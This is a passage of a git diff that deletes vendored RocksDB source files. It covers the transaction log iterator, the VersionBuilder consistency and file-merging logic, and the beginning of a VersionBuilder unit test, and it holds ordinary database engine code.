-    uint64_t startFileIndex,
-    bool strict) {
-  std::string scratch;
-  Slice record;
-  started_ = false;
-  isValid_ = false;
-  if (files_->size() <= startFileIndex) {
-    return;
-  }
-  Status s = OpenLogReader(files_->at(startFileIndex).get());
-  if (!s.ok()) {
-    currentStatus_ = s;
-    reporter_.Info(currentStatus_.ToString().c_str());
-    return;
-  }
-  while (RestrictedRead(&record, &scratch)) {
-    if (record.size() < WriteBatchInternal::kHeader) {
-      reporter_.Corruption(
-        record.size(), Status::Corruption("very small log record"));
-      continue;
-    }
-    UpdateCurrentWriteBatch(record);
-    if (currentLastSeq_ >= startingSequenceNumber_) {
-      if (strict && currentBatchSeq_ != startingSequenceNumber_) {
-        currentStatus_ = Status::Corruption("Gap in sequence number. Could not "
-                                            "seek to required sequence number");
-        reporter_.Info(currentStatus_.ToString().c_str());
-        return;
-      } else if (strict) {
-        reporter_.Info("Could seek required sequence number. Iterator will "
-                       "continue.");
-      }
-      isValid_ = true;
-      started_ = true; // set started_ as we could seek till starting sequence
-      return;
-    } else {
-      isValid_ = false;
-    }
-  }
-
-  // Could not find start sequence in first file. Normally this must be the
-  // only file. Otherwise log the error and let the iterator return next entry
-  // If strict is set, we want to seek exactly till the start sequence and it
-  // should have been present in the file we scanned above
-  if (strict) {
-    currentStatus_ = Status::Corruption("Gap in sequence number. Could not "
-                                        "seek to required sequence number");
-    reporter_.Info(currentStatus_.ToString().c_str());
-  } else if (files_->size() != 1) {
-    currentStatus_ = Status::Corruption("Start sequence was not found, "
-                                        "skipping to the next available");
-    reporter_.Info(currentStatus_.ToString().c_str());
-    // Let NextImpl find the next available entry. started_ remains false
-    // because we don't want to check for gaps while moving to start sequence
-    NextImpl(true);
-  }
-}
-
-void TransactionLogIteratorImpl::Next() {
-  return NextImpl(false);
-}
-
-void TransactionLogIteratorImpl::NextImpl(bool internal) {
-  std::string scratch;
-  Slice record;
-  isValid_ = false;
-  if (!internal && !started_) {
-    // Runs every time until we can seek to the start sequence
-    return SeekToStartSequence();
-  }
-  while(true) {
-    assert(currentLogReader_);
-    if (currentLogReader_->IsEOF()) {
-      currentLogReader_->UnmarkEOF();
-    }
-    while (RestrictedRead(&record, &scratch)) {
-      if (record.size() < WriteBatchInternal::kHeader) {
-        reporter_.Corruption(
-          record.size(), Status::Corruption("very small log record"));
-        continue;
-      } else {
-        // started_ should be true if called by application
-        assert(internal || started_);
-        // started_ should be false if called internally
-        assert(!internal || !started_);
-        UpdateCurrentWriteBatch(record);
-        if (internal && !started_) {
-          started_ = true;
-        }
-        return;
-      }
-    }
-
-    // Open the next file
-    if (currentFileIndex_ < files_->size() - 1) {
-      ++currentFileIndex_;
-      Status s = OpenLogReader(files_->at(currentFileIndex_).get());
-      if (!s.ok()) {
-        isValid_ = false;
-        currentStatus_ = s;
-        return;
-      }
-    } else {
-      isValid_ = false;
-      if (currentLastSeq_ == versions_->LastSequence()) {
-        currentStatus_ = Status::OK();
-      } else {
-        currentStatus_ = Status::Corruption("NO MORE DATA LEFT");
-      }
-      return;
-    }
-  }
-}
-
-bool TransactionLogIteratorImpl::IsBatchExpected(
-    const WriteBatch* batch,
-    const SequenceNumber expectedSeq) {
-  assert(batch);
-  SequenceNumber batchSeq = WriteBatchInternal::Sequence(batch);
-  if (batchSeq != expectedSeq) {
-    char buf[200];
-    snprintf(buf, sizeof(buf),
-             "Discontinuity in log records. Got seq=%" PRIu64
-             ", Expected seq=%" PRIu64 ", Last flushed seq=%" PRIu64
-             ".Log iterator will reseek the correct batch.",
-             batchSeq, expectedSeq, versions_->LastSequence());
-    reporter_.Info(buf);
-    return false;
-  }
-  return true;
-}
-
-void TransactionLogIteratorImpl::UpdateCurrentWriteBatch(const Slice& record) {
-  std::unique_ptr<WriteBatch> batch(new WriteBatch());
-  WriteBatchInternal::SetContents(batch.get(), record);
-
-  SequenceNumber expectedSeq = currentLastSeq_ + 1;
-  // If the iterator has started, then confirm that we get continuous batches
-  if (started_ && !IsBatchExpected(batch.get(), expectedSeq)) {
-    // Seek to the batch having expected sequence number
-    if (expectedSeq < files_->at(currentFileIndex_)->StartSequence()) {
-      // Expected batch must lie in the previous log file
-      // Avoid underflow.
-      if (currentFileIndex_ != 0) {
-        currentFileIndex_--;
-      }
-    }
-    startingSequenceNumber_ = expectedSeq;
-    // currentStatus_ will be set to Ok if reseek succeeds
-    currentStatus_ = Status::NotFound("Gap in sequence numbers");
-    return SeekToStartSequence(currentFileIndex_, true);
-  }
-
-  currentBatchSeq_ = WriteBatchInternal::Sequence(batch.get());
-  currentLastSeq_ = currentBatchSeq_ +
-                    WriteBatchInternal::Count(batch.get()) - 1;
-  // currentBatchSeq_ can only change here
-  assert(currentLastSeq_ <= versions_->LastSequence());
-
-  currentBatch_ = std::move(batch);
-  isValid_ = true;
-  currentStatus_ = Status::OK();
-}
-
-Status TransactionLogIteratorImpl::OpenLogReader(const LogFile* logFile) {
-  unique_ptr<SequentialFileReader> file;
-  Status s = OpenLogFile(logFile, &file);
-  if (!s.ok()) {
-    return s;
-  }
-  assert(file);
-  currentLogReader_.reset(new log::Reader(
-      options_->info_log, std::move(file), &reporter_,
-      read_options_.verify_checksums_, 0, logFile->LogNumber()));
-  return Status::OK();
-}
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/transaction_log_impl.h b/thirdparty/rocksdb/db/transaction_log_impl.h
deleted file mode 100644
index 769d833..0000000
--- a/thirdparty/rocksdb/db/transaction_log_impl.h
+++ /dev/null
@@ -1,124 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-#include <vector>
-
-#include "db/log_reader.h"
-#include "db/version_set.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/types.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-
-class LogFileImpl : public LogFile {
- public:
-  LogFileImpl(uint64_t logNum, WalFileType logType, SequenceNumber startSeq,
-              uint64_t sizeBytes) :
-    logNumber_(logNum),
-    type_(logType),
-    startSequence_(startSeq),
-    sizeFileBytes_(sizeBytes) {
-  }
-
-  std::string PathName() const override {
-    if (type_ == kArchivedLogFile) {
-      return ArchivedLogFileName("", logNumber_);
-    }
-    return LogFileName("", logNumber_);
-  }
-
-  uint64_t LogNumber() const override { return logNumber_; }
-
-  WalFileType Type() const override { return type_; }
-
-  SequenceNumber StartSequence() const override { return startSequence_; }
-
-  uint64_t SizeFileBytes() const override { return sizeFileBytes_; }
-
-  bool operator < (const LogFile& that) const {
-    return LogNumber() < that.LogNumber();
-  }
-
- private:
-  uint64_t logNumber_;
-  WalFileType type_;
-  SequenceNumber startSequence_;
-  uint64_t sizeFileBytes_;
-
-};
-
-class TransactionLogIteratorImpl : public TransactionLogIterator {
- public:
-  TransactionLogIteratorImpl(
-      const std::string& dir, const ImmutableDBOptions* options,
-      const TransactionLogIterator::ReadOptions& read_options,
-      const EnvOptions& soptions, const SequenceNumber seqNum,
-      std::unique_ptr<VectorLogPtr> files, VersionSet const* const versions);
-
-  virtual bool Valid() override;
-
-  virtual void Next() override;
-
-  virtual Status status() override;
-
-  virtual BatchResult GetBatch() override;
-
- private:
-  const std::string& dir_;
-  const ImmutableDBOptions* options_;
-  const TransactionLogIterator::ReadOptions read_options_;
-  const EnvOptions& soptions_;
-  SequenceNumber startingSequenceNumber_;
-  std::unique_ptr<VectorLogPtr> files_;
-  bool started_;
-  bool isValid_;  // not valid when it starts of.
-  Status currentStatus_;
-  size_t currentFileIndex_;
-  std::unique_ptr<WriteBatch> currentBatch_;
-  unique_ptr<log::Reader> currentLogReader_;
-  Status OpenLogFile(const LogFile* logFile,
-                     unique_ptr<SequentialFileReader>* file);
-
-  struct LogReporter : public log::Reader::Reporter {
-    Env* env;
-    Logger* info_log;
-    virtual void Corruption(size_t bytes, const Status& s) override {
-      ROCKS_LOG_ERROR(info_log, "dropping %" ROCKSDB_PRIszt " bytes; %s", bytes,
-                      s.ToString().c_str());
-    }
-    virtual void Info(const char* s) { ROCKS_LOG_INFO(info_log, "%s", s); }
-  } reporter_;
-
-  SequenceNumber currentBatchSeq_; // sequence number at start of current batch
-  SequenceNumber currentLastSeq_; // last sequence in the current batch
-  // Used only to get latest seq. num
-  // TODO(icanadi) can this be just a callback?
-  VersionSet const* const versions_;
-
-  // Reads from transaction log only if the writebatch record has been written
-  bool RestrictedRead(Slice* record, std::string* scratch);
-  // Seeks to startingSequenceNumber reading from startFileIndex in files_.
-  // If strict is set,then must get a batch starting with startingSequenceNumber
-  void SeekToStartSequence(uint64_t startFileIndex = 0, bool strict = false);
-  // Implementation of Next. SeekToStartSequence calls it internally with
-  // internal=true to let it find next entry even if it has to jump gaps because
-  // the iterator may start off from the first available entry but promises to
-  // be continuous after that
-  void NextImpl(bool internal = false);
-  // Check if batch is expected, else return false
-  bool IsBatchExpected(const WriteBatch* batch, SequenceNumber expectedSeq);
-  // Update current batch if a continuous batch is found, else return false
-  void UpdateCurrentWriteBatch(const Slice& record);
-  Status OpenLogReader(const LogFile* file);
-};
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/version_builder.cc b/thirdparty/rocksdb/db/version_builder.cc
deleted file mode 100644
index e8db675..0000000
--- a/thirdparty/rocksdb/db/version_builder.cc
+++ /dev/null
@@ -1,467 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/version_builder.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <atomic>
-#include <functional>
-#include <map>
-#include <set>
-#include <thread>
-#include <unordered_map>
-#include <unordered_set>
-#include <utility>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "db/internal_stats.h"
-#include "db/table_cache.h"
-#include "db/version_set.h"
-#include "port/port.h"
-#include "table/table_reader.h"
-
-namespace rocksdb {
-
-bool NewestFirstBySeqNo(FileMetaData* a, FileMetaData* b) {
-  if (a->largest_seqno != b->largest_seqno) {
-    return a->largest_seqno > b->largest_seqno;
-  }
-  if (a->smallest_seqno != b->smallest_seqno) {
-    return a->smallest_seqno > b->smallest_seqno;
-  }
-  // Break ties by file number
-  return a->fd.GetNumber() > b->fd.GetNumber();
-}
-
-namespace {
-bool BySmallestKey(FileMetaData* a, FileMetaData* b,
-                   const InternalKeyComparator* cmp) {
-  int r = cmp->Compare(a->smallest, b->smallest);
-  if (r != 0) {
-    return (r < 0);
-  }
-  // Break ties by file number
-  return (a->fd.GetNumber() < b->fd.GetNumber());
-}
-}  // namespace
-
-class VersionBuilder::Rep {
- private:
-  // Helper to sort files_ in v
-  // kLevel0 -- NewestFirstBySeqNo
-  // kLevelNon0 -- BySmallestKey
-  struct FileComparator {
-    enum SortMethod { kLevel0 = 0, kLevelNon0 = 1, } sort_method;
-    const InternalKeyComparator* internal_comparator;
-
-    bool operator()(FileMetaData* f1, FileMetaData* f2) const {
-      switch (sort_method) {
-        case kLevel0:
-          return NewestFirstBySeqNo(f1, f2);
-        case kLevelNon0:
-          return BySmallestKey(f1, f2, internal_comparator);
-      }
-      assert(false);
-      return false;
-    }
-  };
-
-  struct LevelState {
-    std::unordered_set<uint64_t> deleted_files;
-    // Map from file number to file meta data.
-    std::unordered_map<uint64_t, FileMetaData*> added_files;
-  };
-
-  const EnvOptions& env_options_;
-  Logger* info_log_;
-  TableCache* table_cache_;
-  VersionStorageInfo* base_vstorage_;
-  int num_levels_;
-  LevelState* levels_;
-  // Store states of levels larger than num_levels_. We do this instead of
-  // storing them in levels_ to avoid regression in case there are no files
-  // on invalid levels. The version is not consistent if in the end the files
-  // on invalid levels don't cancel out.
-  std::map<int, std::unordered_set<uint64_t>> invalid_levels_;
-  // Whether there are invalid new files or invalid deletion on levels larger
-  // than num_levels_.
-  bool has_invalid_levels_;
-  FileComparator level_zero_cmp_;
-  FileComparator level_nonzero_cmp_;
-
- public:
-  Rep(const EnvOptions& env_options, Logger* info_log, TableCache* table_cache,
-      VersionStorageInfo* base_vstorage)
-      : env_options_(env_options),
-        info_log_(info_log),
-        table_cache_(table_cache),
-        base_vstorage_(base_vstorage),
-        num_levels_(base_vstorage->num_levels()),
-        has_invalid_levels_(false) {
-    levels_ = new LevelState[num_levels_];
-    level_zero_cmp_.sort_method = FileComparator::kLevel0;
-    level_nonzero_cmp_.sort_method = FileComparator::kLevelNon0;
-    level_nonzero_cmp_.internal_comparator =
-        base_vstorage_->InternalComparator();
-  }
-
-  ~Rep() {
-    for (int level = 0; level < num_levels_; level++) {
-      const auto& added = levels_[level].added_files;
-      for (auto& pair : added) {
-        UnrefFile(pair.second);
-      }
-    }
-
-    delete[] levels_;
-  }
-
-  void UnrefFile(FileMetaData* f) {
-    f->refs--;
-    if (f->refs <= 0) {
-      if (f->table_reader_handle) {
-        assert(table_cache_ != nullptr);
-        table_cache_->ReleaseHandle(f->table_reader_handle);
-        f->table_reader_handle = nullptr;
-      }
-      delete f;
-    }
-  }
-
-  void CheckConsistency(VersionStorageInfo* vstorage) {
-#ifdef NDEBUG
-    if (!vstorage->force_consistency_checks()) {
-      // Dont run consistency checks in release mode except if
-      // explicitly asked to
-      return;
-    }
-#endif
-    // make sure the files are sorted correctly
-    for (int level = 0; level < num_levels_; level++) {
-      auto& level_files = vstorage->LevelFiles(level);
-      for (size_t i = 1; i < level_files.size(); i++) {
-        auto f1 = level_files[i - 1];
-        auto f2 = level_files[i];
-        if (level == 0) {
-          if (!level_zero_cmp_(f1, f2)) {
-            fprintf(stderr, "L0 files are not sorted properly");
-            abort();
-          }
-
-          if (f2->smallest_seqno == f2->largest_seqno) {
-            // This is an external file that we ingested
-            SequenceNumber external_file_seqno = f2->smallest_seqno;
-            if (!(external_file_seqno < f1->largest_seqno ||
-                  external_file_seqno == 0)) {
-              fprintf(stderr, "L0 file with seqno %" PRIu64 " %" PRIu64
-                              " vs. file with global_seqno %" PRIu64 "\n",
-                      f1->smallest_seqno, f1->largest_seqno,
-                      external_file_seqno);
-              abort();
-            }
-          } else if (f1->smallest_seqno <= f2->smallest_seqno) {
-            fprintf(stderr, "L0 files seqno %" PRIu64 " %" PRIu64
-                            " vs. %" PRIu64 " %" PRIu64 "\n",
-                    f1->smallest_seqno, f1->largest_seqno, f2->smallest_seqno,
-                    f2->largest_seqno);
-            abort();
-          }
-        } else {
-          if (!level_nonzero_cmp_(f1, f2)) {
-            fprintf(stderr, "L%d files are not sorted properly", level);
-            abort();
-          }
-
-          // Make sure there is no overlap in levels > 0
-          if (vstorage->InternalComparator()->Compare(f1->largest,
-                                                      f2->smallest) >= 0) {
-            fprintf(stderr, "L%d have overlapping ranges %s vs. %s\n", level,
-                    (f1->largest).DebugString(true).c_str(),
-                    (f2->smallest).DebugString(true).c_str());
-            abort();
-          }
-        }
-      }
-    }
-  }
-
-  void CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number,
-                                  int level) {
-#ifdef NDEBUG
-    if (!base_vstorage_->force_consistency_checks()) {
-      // Dont run consistency checks in release mode except if
-      // explicitly asked to
-      return;
-    }
-#endif
-    // a file to be deleted better exist in the previous version
-    bool found = false;
-    for (int l = 0; !found && l < num_levels_; l++) {
-      const std::vector<FileMetaData*>& base_files =
-          base_vstorage_->LevelFiles(l);
-      for (size_t i = 0; i < base_files.size(); i++) {
-        FileMetaData* f = base_files[i];
-        if (f->fd.GetNumber() == number) {
-          found = true;
-          break;
-        }
-      }
-    }
-    // if the file did not exist in the previous version, then it
-    // is possibly moved from lower level to higher level in current
-    // version
-    for (int l = level + 1; !found && l < num_levels_; l++) {
-      auto& level_added = levels_[l].added_files;
-      auto got = level_added.find(number);
-      if (got != level_added.end()) {
-        found = true;
-        break;
-      }
-    }
-
-    // maybe this file was added in a previous edit that was Applied
-    if (!found) {
-      auto& level_added = levels_[level].added_files;
-      auto got = level_added.find(number);
-      if (got != level_added.end()) {
-        found = true;
-      }
-    }
-    if (!found) {
-      fprintf(stderr, "not found %" PRIu64 "\n", number);
-      abort();
-    }
-  }
-
-  bool CheckConsistencyForNumLevels() {
-    // Make sure there are no files on or beyond num_levels().
-    if (has_invalid_levels_) {
-      return false;
-    }
-    for (auto& level : invalid_levels_) {
-      if (level.second.size() > 0) {
-        return false;
-      }
-    }
-    return true;
-  }
-
-  // Apply all of the edits in *edit to the current state.
-  void Apply(VersionEdit* edit) {
-    CheckConsistency(base_vstorage_);
-
-    // Delete files
-    const VersionEdit::DeletedFileSet& del = edit->GetDeletedFiles();
-    for (const auto& del_file : del) {
-      const auto level = del_file.first;
-      const auto number = del_file.second;
-      if (level < num_levels_) {
-        levels_[level].deleted_files.insert(number);
-        CheckConsistencyForDeletes(edit, number, level);
-
-        auto exising = levels_[level].added_files.find(number);
-        if (exising != levels_[level].added_files.end()) {
-          UnrefFile(exising->second);
-          levels_[level].added_files.erase(number);
-        }
-      } else {
-        if (invalid_levels_[level].count(number) > 0) {
-          invalid_levels_[level].erase(number);
-        } else {
-          // Deleting an non-existing file on invalid level.
-          has_invalid_levels_ = true;
-        }
-      }
-    }
-
-    // Add new files
-    for (const auto& new_file : edit->GetNewFiles()) {
-      const int level = new_file.first;
-      if (level < num_levels_) {
-        FileMetaData* f = new FileMetaData(new_file.second);
-        f->refs = 1;
-
-        assert(levels_[level].added_files.find(f->fd.GetNumber()) ==
-               levels_[level].added_files.end());
-        levels_[level].deleted_files.erase(f->fd.GetNumber());
-        levels_[level].added_files[f->fd.GetNumber()] = f;
-      } else {
-        uint64_t number = new_file.second.fd.GetNumber();
-        if (invalid_levels_[level].count(number) == 0) {
-          invalid_levels_[level].insert(number);
-        } else {
-          // Creating an already existing file on invalid level.
-          has_invalid_levels_ = true;
-        }
-      }
-    }
-  }
-
-  // Save the current state in *v.
-  void SaveTo(VersionStorageInfo* vstorage) {
-    CheckConsistency(base_vstorage_);
-    CheckConsistency(vstorage);
-
-    for (int level = 0; level < num_levels_; level++) {
-      const auto& cmp = (level == 0) ? level_zero_cmp_ : level_nonzero_cmp_;
-      // Merge the set of added files with the set of pre-existing files.
-      // Drop any deleted files.  Store the result in *v.
-      const auto& base_files = base_vstorage_->LevelFiles(level);
-      auto base_iter = base_files.begin();
-      auto base_end = base_files.end();
-      const auto& unordered_added_files = levels_[level].added_files;
-      vstorage->Reserve(level,
-                        base_files.size() + unordered_added_files.size());
-
-      // Sort added files for the level.
-      std::vector<FileMetaData*> added_files;
-      added_files.reserve(unordered_added_files.size());
-      for (const auto& pair : unordered_added_files) {
-        added_files.push_back(pair.second);
-      }
-      std::sort(added_files.begin(), added_files.end(), cmp);
-
-#ifndef NDEBUG
-      FileMetaData* prev_file = nullptr;
-#endif
-
-      for (const auto& added : added_files) {
-#ifndef NDEBUG
-        if (level > 0 && prev_file != nullptr) {
-          assert(base_vstorage_->InternalComparator()->Compare(
-                     prev_file->smallest, added->smallest) <= 0);
-        }
-        prev_file = added;
-#endif
-
-        // Add all smaller files listed in base_
-        for (auto bpos = std::upper_bound(base_iter, base_end, added, cmp);
-             base_iter != bpos; ++base_iter) {
-          MaybeAddFile(vstorage, level, *base_iter);
-        }
-
-        MaybeAddFile(vstorage, level, added);
-      }
-
-      // Add remaining base files
-      for (; base_iter != base_end; ++base_iter) {
-        MaybeAddFile(vstorage, level, *base_iter);
-      }
-    }
-
-    CheckConsistency(vstorage);
-  }
-
-  void LoadTableHandlers(InternalStats* internal_stats, int max_threads,
-                         bool prefetch_index_and_filter_in_cache) {
-    assert(table_cache_ != nullptr);
-    // <file metadata, level>
-    std::vector<std::pair<FileMetaData*, int>> files_meta;
-    for (int level = 0; level < num_levels_; level++) {
-      for (auto& file_meta_pair : levels_[level].added_files) {
-        auto* file_meta = file_meta_pair.second;
-        assert(!file_meta->table_reader_handle);
-        files_meta.emplace_back(file_meta, level);
-      }
-    }
-
-    std::atomic<size_t> next_file_meta_idx(0);
-    std::function<void()> load_handlers_func = [&]() {
-      while (true) {
-        size_t file_idx = next_file_meta_idx.fetch_add(1);
-        if (file_idx >= files_meta.size()) {
-          break;
-        }
-
-        auto* file_meta = files_meta[file_idx].first;
-        int level = files_meta[file_idx].second;
-        table_cache_->FindTable(env_options_,
-                                *(base_vstorage_->InternalComparator()),
-                                file_meta->fd, &file_meta->table_reader_handle,
-                                false /*no_io */, true /* record_read_stats */,
-                                internal_stats->GetFileReadHist(level), false,
-                                level, prefetch_index_and_filter_in_cache);
-        if (file_meta->table_reader_handle != nullptr) {
-          // Load table_reader
-          file_meta->fd.table_reader = table_cache_->GetTableReaderFromHandle(
-              file_meta->table_reader_handle);
-        }
-      }
-    };
-
-    if (max_threads <= 1) {
-      load_handlers_func();
-    } else {
-      std::vector<port::Thread> threads;
-      for (int i = 0; i < max_threads; i++) {
-        threads.emplace_back(load_handlers_func);
-      }
-
-      for (auto& t : threads) {
-        t.join();
-      }
-    }
-  }
-
-  void MaybeAddFile(VersionStorageInfo* vstorage, int level, FileMetaData* f) {
-    if (levels_[level].deleted_files.count(f->fd.GetNumber()) > 0) {
-      // f is to-be-delected table file
-      vstorage->RemoveCurrentStats(f);
-    } else {
-      vstorage->AddFile(level, f, info_log_);
-    }
-  }
-};
-
-VersionBuilder::VersionBuilder(const EnvOptions& env_options,
-                               TableCache* table_cache,
-                               VersionStorageInfo* base_vstorage,
-                               Logger* info_log)
-    : rep_(new Rep(env_options, info_log, table_cache, base_vstorage)) {}
-
-VersionBuilder::~VersionBuilder() { delete rep_; }
-
-void VersionBuilder::CheckConsistency(VersionStorageInfo* vstorage) {
-  rep_->CheckConsistency(vstorage);
-}
-
-void VersionBuilder::CheckConsistencyForDeletes(VersionEdit* edit,
-                                                uint64_t number, int level) {
-  rep_->CheckConsistencyForDeletes(edit, number, level);
-}
-
-bool VersionBuilder::CheckConsistencyForNumLevels() {
-  return rep_->CheckConsistencyForNumLevels();
-}
-
-void VersionBuilder::Apply(VersionEdit* edit) { rep_->Apply(edit); }
-
-void VersionBuilder::SaveTo(VersionStorageInfo* vstorage) {
-  rep_->SaveTo(vstorage);
-}
-
-void VersionBuilder::LoadTableHandlers(
-    InternalStats* internal_stats, int max_threads,
-    bool prefetch_index_and_filter_in_cache) {
-  rep_->LoadTableHandlers(internal_stats, max_threads,
-                          prefetch_index_and_filter_in_cache);
-}
-
-void VersionBuilder::MaybeAddFile(VersionStorageInfo* vstorage, int level,
-                                  FileMetaData* f) {
-  rep_->MaybeAddFile(vstorage, level, f);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_builder.h b/thirdparty/rocksdb/db/version_builder.h
deleted file mode 100644
index 440d4ea..0000000
--- a/thirdparty/rocksdb/db/version_builder.h
+++ /dev/null
@@ -1,45 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-#pragma once
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-class TableCache;
-class VersionStorageInfo;
-class VersionEdit;
-struct FileMetaData;
-class InternalStats;
-
-// A helper class so we can efficiently apply a whole sequence
-// of edits to a particular state without creating intermediate
-// Versions that contain full copies of the intermediate state.
-class VersionBuilder {
- public:
-  VersionBuilder(const EnvOptions& env_options, TableCache* table_cache,
-                 VersionStorageInfo* base_vstorage, Logger* info_log = nullptr);
-  ~VersionBuilder();
-  void CheckConsistency(VersionStorageInfo* vstorage);
-  void CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number,
-                                  int level);
-  bool CheckConsistencyForNumLevels();
-  void Apply(VersionEdit* edit);
-  void SaveTo(VersionStorageInfo* vstorage);
-  void LoadTableHandlers(InternalStats* internal_stats, int max_threads,
-                         bool prefetch_index_and_filter_in_cache);
-  void MaybeAddFile(VersionStorageInfo* vstorage, int level, FileMetaData* f);
-
- private:
-  class Rep;
-  Rep* rep_;
-};
-
-extern bool NewestFirstBySeqNo(FileMetaData* a, FileMetaData* b);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_builder_test.cc b/thirdparty/rocksdb/db/version_builder_test.cc
deleted file mode 100644
index 304df2a..0000000
--- a/thirdparty/rocksdb/db/version_builder_test.cc
+++ /dev/null
@@ -1,305 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <string>
-#include "db/version_edit.h"
-#include "db/version_set.h"
-#include "util/logging.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class VersionBuilderTest : public testing::Test {
- public:
-  const Comparator* ucmp_;
-  InternalKeyComparator icmp_;
-  Options options_;
-  ImmutableCFOptions ioptions_;
-  MutableCFOptions mutable_cf_options_;
-  VersionStorageInfo vstorage_;
-  uint32_t file_num_;
-  CompactionOptionsFIFO fifo_options_;
-  std::vector<uint64_t> size_being_compacted_;
-
-  VersionBuilderTest()
-      : ucmp_(BytewiseComparator()),
-        icmp_(ucmp_),
-        ioptions_(options_),
-        mutable_cf_options_(options_),
-        vstorage_(&icmp_, ucmp_, options_.num_levels, kCompactionStyleLevel,
-                  nullptr, false),
-        file_num_(1) {
-    mutable_cf_options_.RefreshDerivedOptions(ioptions_);
-    size_being_compacted_.resize(options_.num_levels);
-  }
-
-  ~VersionBuilderTest() {
-    for (int i = 0; i < vstorage_.num_levels(); i++) {
-      for (auto* f : vstorage_.LevelFiles(i)) {
-        if (--f->refs == 0) {
-          delete f;
-        }
-      }
-    }
-  }
-
-  InternalKey GetInternalKey(const char* ukey,
-                             SequenceNumber smallest_seq = 100) {
-    return InternalKey(ukey, smallest_seq, kTypeValue);
-  }
-
-  void Add(int level, uint32_t file_number, const char* smallest,
-           const char* largest, uint64_t file_size = 0, uint32_t path_id = 0,
-           SequenceNumber smallest_seq = 100, SequenceNumber largest_seq = 100,
-           uint64_t num_entries = 0, uint64_t num_deletions = 0,
-           bool sampled = false, SequenceNumber smallest_seqno = 0,
-           SequenceNumber largest_seqno = 0) {
-    assert(level < vstorage_.num_levels());
-    FileMetaData* f = new FileMetaData;
-    f->fd = FileDescriptor(file_number, path_id, file_size);
-    f->smallest = GetInternalKey(smallest, smallest_seq);
-    f->largest = GetInternalKey(largest, largest_seq);
-    f->smallest_seqno = smallest_seqno;
-    f->largest_seqno = largest_seqno;
-    f->compensated_file_size = file_size;
-    f->refs = 0;
-    f->num_entries = num_entries;
-    f->num_deletions = num_deletions;
-    vstorage_.AddFile(level, f);
-    if (sampled) {
-      f->init_stats_from_file = true;
-      vstorage_.UpdateAccumulatedStats(f);
-    }
-  }
-
-  void UpdateVersionStorageInfo() {
-    vstorage_.UpdateFilesByCompactionPri(ioptions_.compaction_pri);
-    vstorage_.UpdateNumNonEmptyLevels();
-    vstorage_.GenerateFileIndexer();
-    vstorage_.GenerateLevelFilesBrief();
-    vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-    vstorage_.GenerateLevel0NonOverlapping();
-    vstorage_.SetFinalized();
-  }
-};
-
-void UnrefFilesInVersion(VersionStorageInfo* new_vstorage) {
-  for (int i = 0; i < new_vstorage->num_levels(); i++) {
-    for (auto* f : new_vstorage->LevelFiles(i)) {
-      if (--f->refs == 0) {
-        delete f;
-      }
-    }
-  }
-}
-
-TEST_F(VersionBuilderTest, ApplyAndSaveTo) {
-  Add(0, 1U, "150", "200", 100U);
-
-  Add(1, 66U, "150", "200", 100U);
-  Add(1, 88U, "201", "300", 100U);
-
-  Add(2, 6U, "150", "179", 100U);
-  Add(2, 7U, "180", "220", 100U);
-  Add(2, 8U, "221", "300", 100U);
-
-  Add(3, 26U, "150", "170", 100U);
-  Add(3, 27U, "171", "179", 100U);
-  Add(3, 28U, "191", "220", 100U);
-  Add(3, 29U, "221", "300", 100U);
-  UpdateVersionStorageInfo();
-
-  VersionEdit version_edit;
-  version_edit.AddFile(2, 666, 0, 100U, GetInternalKey("301"),
-                       GetInternalKey("350"), 200, 200, false);
-  version_edit.DeleteFile(3, 27U);
-
-  EnvOptions env_options;
-
-  VersionBuilder version_builder(env_options, nullptr, &vstorage_);
-
-  VersionStorageInfo new_vstorage(&icmp_, ucmp_, options_.num_levels,
-                                  kCompactionStyleLevel, nullptr, false);
-  version_builder.Apply(&version_edit);
-  version_builder.SaveTo(&new_vstorage);
-
-  ASSERT_EQ(400U, new_vstorage.NumLevelBytes(2));
-  ASSERT_EQ(300U, new_vstorage.NumLevelBytes(3));
-
-  UnrefFilesInVersion(&new_vstorage);
-}
-
-TEST_F(VersionBuilderTest, ApplyAndSaveToDynamic) {
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-
-  Add(0, 1U, "150", "200", 100U, 0, 200U, 200U, 0, 0, false, 200U, 200U);
